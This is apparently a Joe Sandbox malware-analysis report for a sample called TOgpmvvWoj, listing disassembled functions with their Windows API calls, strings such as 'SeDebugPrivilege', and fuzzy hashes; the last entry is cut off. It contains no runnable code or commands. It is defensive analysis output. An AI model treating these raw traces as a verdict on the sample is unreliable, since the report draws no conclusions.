                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                            • String ID:
                                            • API String ID: 2156557900-0
                                            • Opcode ID: 56bf365925761e3fd6be0174bf4563767acdf6c98d559eae6cbf7c82347f5ad9
                                            • Instruction ID: bc02e558fc2dc833f63450bb76656fe7d1a287c9b5041bbb8744c69edeed6211
                                            • Opcode Fuzzy Hash: 56bf365925761e3fd6be0174bf4563767acdf6c98d559eae6cbf7c82347f5ad9
                                            • Instruction Fuzzy Hash: 8C31B175601304BFDB259F1AEC84B6937ADEB16715F108097F808F62A0E7709D488B50
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Variant$ClearInit$_memset
                                            • String ID: ,,$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                            • API String ID: 2862541840-218231672
                                            • Opcode ID: 88eba7c16981577697f16f25727fedff5f94754f847d02ed82044536ce51c5ac
                                            • Instruction ID: 791923c465a44a0aeae90ecba8ee5d2c1ccdbc928d9957b77c5e8884c108ba15
                                            • Opcode Fuzzy Hash: 88eba7c16981577697f16f25727fedff5f94754f847d02ed82044536ce51c5ac
                                            • Instruction Fuzzy Hash: 89919E71E00219ABDF24EFA5C844FAEB7B8EF85314F189159E51DBB241D7709905CFA0
                                            APIs
                                            • EnumChildWindows.USER32(?,00E6AA64), ref: 00E6A9A2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ChildEnumWindows
                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                            • API String ID: 3555792229-1603158881
                                            • Opcode ID: a355a07cbd180c4fe46e869c8f948fb4a3512cff53bedb6c0f1e69170a0ec26c
                                            • Instruction ID: 59c04fef88989910aee9d8f6c7321deffa25a15922cf5c83593671be6f43632e
                                            • Opcode Fuzzy Hash: a355a07cbd180c4fe46e869c8f948fb4a3512cff53bedb6c0f1e69170a0ec26c
                                            • Instruction Fuzzy Hash: 0F91C830E40206EBDB08DF60E486BE9FBB5BF44344F54A129D89AB7141DF30699ACF91
                                            APIs
                                            • SetWindowLongW.USER32(?,000000EB), ref: 00E12EAE
                                              • Part of subcall function 00E11DB3: GetClientRect.USER32(?,?), ref: 00E11DDC
                                              • Part of subcall function 00E11DB3: GetWindowRect.USER32(?,?), ref: 00E11E1D
                                              • Part of subcall function 00E11DB3: ScreenToClient.USER32(?,?), ref: 00E11E45
                                            • GetDC.USER32 ref: 00E4CF82
                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00E4CF95
                                            • SelectObject.GDI32(00000000,00000000), ref: 00E4CFA3
                                            • SelectObject.GDI32(00000000,00000000), ref: 00E4CFB8
                                            • ReleaseDC.USER32(?,00000000), ref: 00E4CFC0
                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00E4D04B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                            • String ID: U
                                            • API String ID: 4009187628-3372436214
                                            • Opcode ID: fc523f5369e166b58d2035a2e0f85844cb444a8d35ff099f669360207b812552
                                            • Instruction ID: ea71614496f2caff729de171d6c9f350bdde288411e06993ce0885bc7c1f73ae
                                            • Opcode Fuzzy Hash: fc523f5369e166b58d2035a2e0f85844cb444a8d35ff099f669360207b812552
                                            • Instruction Fuzzy Hash: E971E430505205DFCF218F64DC80AEA3BB6FF49318F24526AEE55BB2A6C7318C95DB60
                                            APIs
                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00E9F910), ref: 00E8903D
                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00E9F910), ref: 00E89071
                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00E891EB
                                            • SysFreeString.OLEAUT32(?), ref: 00E89215
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                            • String ID:
                                            • API String ID: 560350794-0
                                            • Opcode ID: bafefb0900d32fdec1c24c58200dda567b94eab5dd0633423e2165ec7189f978
                                            • Instruction ID: c0ef7a0b865027fbe4bd972df0dca4739d2f0d53d1d697e1c47fcc85d88ad343
                                            • Opcode Fuzzy Hash: bafefb0900d32fdec1c24c58200dda567b94eab5dd0633423e2165ec7189f978
                                            • Instruction Fuzzy Hash: A6F11871A00209EFDB04EF94C888EBEB7B9BF49314F149059F919BB252DB31AE45CB50
                                            APIs
                                            • _memset.LIBCMT ref: 00E8F9C9
                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E8FB5C
                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E8FB80
                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E8FBC0
                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E8FBE2
                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E8FD5E
                                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00E8FD90
                                            • CloseHandle.KERNEL32(?), ref: 00E8FDBF
                                            • CloseHandle.KERNEL32(?), ref: 00E8FE36
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                            • String ID:
                                            • API String ID: 4090791747-0
                                            • Opcode ID: 7216cada394d1687c2ee3c643b274e6cbb5bc6decec991e0d384822ac0e682ff
                                            • Instruction ID: 2cf723c908d2e1a4cf791a3b0ea0c68b2d92cd2c869c11c9ff4cbc4e2e40f144
                                            • Opcode Fuzzy Hash: 7216cada394d1687c2ee3c643b274e6cbb5bc6decec991e0d384822ac0e682ff
                                            • Instruction Fuzzy Hash: 8EE1B131204341DFCB14EF24C495B6ABBE1AF84354F14A96DF99EAB2A2DB31DC44CB52
                                            APIs
                                              • Part of subcall function 00E748AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E738D3,?), ref: 00E748C7
                                              • Part of subcall function 00E748AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E738D3,?), ref: 00E748E0
                                              • Part of subcall function 00E74CD3: GetFileAttributesW.KERNEL32(?,00E73947), ref: 00E74CD4
                                            • lstrcmpiW.KERNEL32(?,?), ref: 00E74FE2
                                            • _wcscmp.LIBCMT ref: 00E74FFC
                                            • MoveFileW.KERNEL32(?,?), ref: 00E75017
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                            • String ID:
                                            • API String ID: 793581249-0
                                            • Opcode ID: fca6dc3620fa4a4d469f4da7c5276af90d2b02c9a0710a00ba2dd5a1c3c61e8a
                                            • Instruction ID: 788079a92117e6342f8c5896315efe181dc3735bc57fa1ac7568c284b023acad
                                            • Opcode Fuzzy Hash: fca6dc3620fa4a4d469f4da7c5276af90d2b02c9a0710a00ba2dd5a1c3c61e8a
                                            • Instruction Fuzzy Hash: 5B5186B25087849BC724DB60C8859DFB7ECAF85301F00592FF289E7191EF74A188CB66
                                            APIs
                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00E9896E
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: InvalidateRect
                                            • String ID:
                                            • API String ID: 634782764-0
                                            • Opcode ID: d2220c0868f8b2199d9ddd61385622987e8f4eb9cae9d60799e31721de1243f8
                                            • Instruction ID: 2d1ae66adb40fed1a30a69cf54c4177e6fa0bb922cbd9df0e1eaded93ffd50a5
                                            • Opcode Fuzzy Hash: d2220c0868f8b2199d9ddd61385622987e8f4eb9cae9d60799e31721de1243f8
                                            • Instruction Fuzzy Hash: 9351A030600308BFDF349F29CE85BA93BA5AB06364F606117F515F62B1DFB1A990CB91
                                            APIs
                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00E4C547
                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E4C569
                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00E4C581
                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00E4C59F
                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E4C5C0
                                            • DestroyIcon.USER32(00000000), ref: 00E4C5CF
                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E4C5EC
                                            • DestroyIcon.USER32(?), ref: 00E4C5FB
                                              • Part of subcall function 00E9A71E: DeleteObject.GDI32(00000000), ref: 00E9A757
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                            • String ID:
                                            • API String ID: 2819616528-0
                                            • Opcode ID: d58e3e91fc738abd2d59d22e8b88734e444861904a489449f9c30075f734b774
                                            • Instruction ID: d412b1d91535559efb924e23c530a00af25e2e5fe1090fab8d867d4cf0b0425d
                                            • Opcode Fuzzy Hash: d58e3e91fc738abd2d59d22e8b88734e444861904a489449f9c30075f734b774
                                            • Instruction Fuzzy Hash: 79515674601209AFDB24DF25DC45FAA77B5EB48314F20552AFA02F72A0DB74EDA0DB90
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00E68A84,00000B00,?,?), ref: 00E68E0C
                                            • HeapAlloc.KERNEL32(00000000,?,00E68A84,00000B00,?,?), ref: 00E68E13
                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E68A84,00000B00,?,?), ref: 00E68E28
                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00E68A84,00000B00,?,?), ref: 00E68E30
                                            • DuplicateHandle.KERNEL32(00000000,?,00E68A84,00000B00,?,?), ref: 00E68E33
                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00E68A84,00000B00,?,?), ref: 00E68E43
                                            • GetCurrentProcess.KERNEL32(00E68A84,00000000,?,00E68A84,00000B00,?,?), ref: 00E68E4B
                                            • DuplicateHandle.KERNEL32(00000000,?,00E68A84,00000B00,?,?), ref: 00E68E4E
                                            • CreateThread.KERNEL32(00000000,00000000,00E68E74,00000000,00000000,00000000), ref: 00E68E68
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                            • String ID:
                                            • API String ID: 1957940570-0
                                            • Opcode ID: 20ba4a49b930607b5f00bc6b52943aa261c75ecc484b29a4a27cb217f172c35e
                                            • Instruction ID: efd87ff0bfc04d40f0e151596034f96cdc3e815ae72fc2ab9b599ecb03769aed
                                            • Opcode Fuzzy Hash: 20ba4a49b930607b5f00bc6b52943aa261c75ecc484b29a4a27cb217f172c35e
                                            • Instruction Fuzzy Hash: 8201BF75641304FFE710AB66DC4DF5B3B6CEB89711F104422FA05EB1A2CA71D804CB64
                                            APIs
                                              • Part of subcall function 00E67652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E6758C,80070057,?,?,?,00E6799D), ref: 00E6766F
                                              • Part of subcall function 00E67652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E6758C,80070057,?,?), ref: 00E6768A
                                              • Part of subcall function 00E67652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E6758C,80070057,?,?), ref: 00E67698
                                              • Part of subcall function 00E67652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E6758C,80070057,?), ref: 00E676A8
                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00E89B1B
                                            • _memset.LIBCMT ref: 00E89B28
                                            • _memset.LIBCMT ref: 00E89C6B
                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00E89C97
                                            • CoTaskMemFree.OLE32(?), ref: 00E89CA2
                                            Strings
                                            • NULL Pointer assignment, xrefs: 00E89CF0
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                            • String ID: NULL Pointer assignment
                                            • API String ID: 1300414916-2785691316
                                            • Opcode ID: eb7fd52cedd98360dee091a48d03103cd3883385eebf4641f2e7553a9681c0f4
                                            • Instruction ID: fc81be394b22f2a90edb5c445e5b7d035c91f51f6a88ef20a4901d7024182f10
                                            • Opcode Fuzzy Hash: eb7fd52cedd98360dee091a48d03103cd3883385eebf4641f2e7553a9681c0f4
                                            • Instruction Fuzzy Hash: 6A915871D00229EBDB10DFA4DC85AEEBBB9BF08710F24515AF519B7281DB715A44CFA0
                                            APIs
                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00E97093
                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 00E970A7
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00E970C1
                                            • _wcscat.LIBCMT ref: 00E9711C
                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00E97133
                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00E97161
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window_wcscat
                                            • String ID: SysListView32
                                            • API String ID: 307300125-78025650
                                            • Opcode ID: 4ff7861d06d7ab421269915a2de1f27044af90def7d6faa162b72154c4d0752c
                                            • Instruction ID: 02fb4124131345bdccb4b345fbaa38904b62af0a1f4064833b78b2d56df4a9e7
                                            • Opcode Fuzzy Hash: 4ff7861d06d7ab421269915a2de1f27044af90def7d6faa162b72154c4d0752c
                                            • Instruction Fuzzy Hash: 5D418071A14308AFDF219F64CC85BEE77E8EF08354F10156AF984F7292D6729D888B50
                                            APIs
                                              • Part of subcall function 00E73E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00E73EB6
                                              • Part of subcall function 00E73E91: Process32FirstW.KERNEL32(00000000,?), ref: 00E73EC4
                                              • Part of subcall function 00E73E91: CloseHandle.KERNEL32(00000000), ref: 00E73F8E
                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E8ECB8
                                            • GetLastError.KERNEL32 ref: 00E8ECCB
                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E8ECFA
                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E8ED77
                                            • GetLastError.KERNEL32(00000000), ref: 00E8ED82
                                            • CloseHandle.KERNEL32(00000000), ref: 00E8EDB7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                            • String ID: SeDebugPrivilege
                                            • API String ID: 2533919879-2896544425
                                            • Opcode ID: c67b4e9d2cca1f881a7e59209b64c692a06ce3ad8b842bde9ba9a18d7a114b20
                                            • Instruction ID: fc004d03bd5c974795dcc2bd8326615f42a011cb9e85958ba4b6decc26ad5c11
                                            • Opcode Fuzzy Hash: c67b4e9d2cca1f881a7e59209b64c692a06ce3ad8b842bde9ba9a18d7a114b20
                                            • Instruction Fuzzy Hash: 5641BE702402009FDB14EF24CC95FADB7E1AF80714F08901AF84AAB3C2DB75A808CB96
                                            APIs
                                            • LoadIconW.USER32(00000000,00007F03), ref: 00E732C5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: IconLoad
                                            • String ID: blank$info$question$stop$warning
                                            • API String ID: 2457776203-404129466
                                            • Opcode ID: 9ab8e93c2ead82c92920f526983ff7858ddfe262af4d1095f3022bffbcbe770f
                                            • Instruction ID: d232c53e1885eb3c7480eaef2f89f7ed6f473c26e71eaf98f838403a3629400d
                                            • Opcode Fuzzy Hash: 9ab8e93c2ead82c92920f526983ff7858ddfe262af4d1095f3022bffbcbe770f
                                            • Instruction Fuzzy Hash: BD1187312493DABAA7005A70DC46DAAB7DCDF09338F20602BF908B6193E6B25B0057A5
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E7454E
                                            • LoadStringW.USER32(00000000), ref: 00E74555
                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E7456B
                                            • LoadStringW.USER32(00000000), ref: 00E74572
                                            • _wprintf.LIBCMT ref: 00E74598
                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E745B6
                                            Strings
                                            • %s (%d) : ==> %s: %s %s, xrefs: 00E74593
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: HandleLoadModuleString$Message_wprintf
                                            • String ID: %s (%d) : ==> %s: %s %s
                                            • API String ID: 3648134473-3128320259
                                            • Opcode ID: 6b95619a8f8fdaad5fee8c8a825af3cdc3bbe416d7d730dbe049caa87f8f99a8
                                            • Instruction ID: 7923e4edd283ca9fcf1f4fa08e614aedddf091bacf558dd4bedc5b0b52762d9e
                                            • Opcode Fuzzy Hash: 6b95619a8f8fdaad5fee8c8a825af3cdc3bbe416d7d730dbe049caa87f8f99a8
                                            • Instruction Fuzzy Hash: ED0144F2500308BFE71097A29D89EF6776CD708301F0005A7F749F2052E6749E858BB0
                                            APIs
                                              • Part of subcall function 00E12612: GetWindowLongW.USER32(?,000000EB), ref: 00E12623
                                            • GetSystemMetrics.USER32(0000000F), ref: 00E9D78A
                                            • GetSystemMetrics.USER32(0000000F), ref: 00E9D7AA
                                            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00E9D9E5
                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00E9DA03
                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00E9DA24
                                            • ShowWindow.USER32(00000003,00000000), ref: 00E9DA43
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00E9DA68
                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 00E9DA8B
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
